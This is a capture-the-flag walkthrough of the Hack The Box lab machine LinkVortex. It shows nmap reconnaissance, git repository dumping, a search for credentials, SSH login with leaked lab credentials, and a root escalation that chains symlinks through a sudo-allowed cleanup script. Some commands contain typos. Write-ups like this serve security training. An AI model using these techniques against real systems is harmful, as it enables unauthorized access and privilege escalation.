The LinkVortex is the machine from hack the box lab created by 0xyassine. In this walkthrough, I will demonstrate how I obtained complete ownership of this machine.

https://www.hackthebox.com/machines/LinkVortex

I have owned link vortex from hack the box

https://www.hackthebox.com/achievement/machine/615731/638

Nmap Scanning

$ nmap -vvv -p- -T4 -oA nmap/initial 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 14:49:12 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p- -T4 -oA nmap/initial 10.10.11.47
Increasing send delay for 10.10.11.47 from 0 to 5 due to 629 out of 1571 dropped probes since last increase.
Increasing send delay for 10.10.11.47 from 5 to 10 due to 75 out of 186 dropped probes since last increase.
Warning: 10.10.11.47 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.47
Host is up, received reset ttl 63 (0.65s latency).
Scanned at 2024-12-13 14:49:13 +0545 for 2713s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
# Nmap done at Fri Dec 13 15:34:26 2024 -- 1 IP address (1 host up) scanned in 2715.23 seconds

Here, we can see that port 22 and 80 are open as ssh and http. Now port scanning is done using map which results in

$ nmap -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 16:51:54 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received echo-reply ttl 63 (0.55s latency).
Scanned at 2024-12-13 16:51:54 +0545 for 36s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63 Apache httpd
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-generator: Ghost 5.58
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 13 16:52:30 2024 -- 1 IP address (1 host up) scanned in 36.66 seconds

As there is web service running we will curl to get some initial information about the ip

$ curl -v 10.10.11.47

This will show some html text and where we can see it is moved permanently to linkvortex.htb so now we modify our hosts so that the url will run in our machine

$ sudo nano /etc/hosts

Add the ip and its corresponding url in the text editor

#.....
..
10.10.11.47    linkvortex.htb
.......
.......

Now when we run linkvortex.htb in browser then it will run with no errors

Enumeration

$ gobuster dir -u linkvortex.htb -w /usr/share/wordlists/drib/common.txt
or
$ dirsearch -r http://linkvortex.htb

$ gobuster dns -d linkvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top0million-5000.txt

git dumper

$ git-dumper http//:10.10.11.47/ ./linkvortex_dumped

Find

$ find * | grep -iR password

by guessing we get admin@linkvortex.htb as email

using wappalyzer we get ghost 5.58 running which CVE is searched

Get user flag

we find GitHub repo on search written by the creator of this machine

https://github.com/0xyassine/CVE-2023-40028

from the docker file we use the provided cp information of /var/lib/ghost/config.production.json that provide us with the user and password for ssh

username:bob@linkvortex.htb
password:fibber-talented-worth

using the user and password we login to the system using ssh

$ ssh bob@linkvortex.htb

Where we cat out our user.txt flag.

Get root flag

use the command sudo -l to check what are allowed to execute and found

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

/usr/bin/bash /opt/ghost/clean_symlink.sh this does not require password to execute so

bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh 
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

we can check_content=true while executing the sudo command

$ ln -s /root/root.txt flag.txt
$ ln -s /home/bob/flag.txt flag.png
$ sudo CHECK_CONTENT=True /usr/bin/bash /opt/ghost/clean_symlink.sh flag.png

This will provide root flag.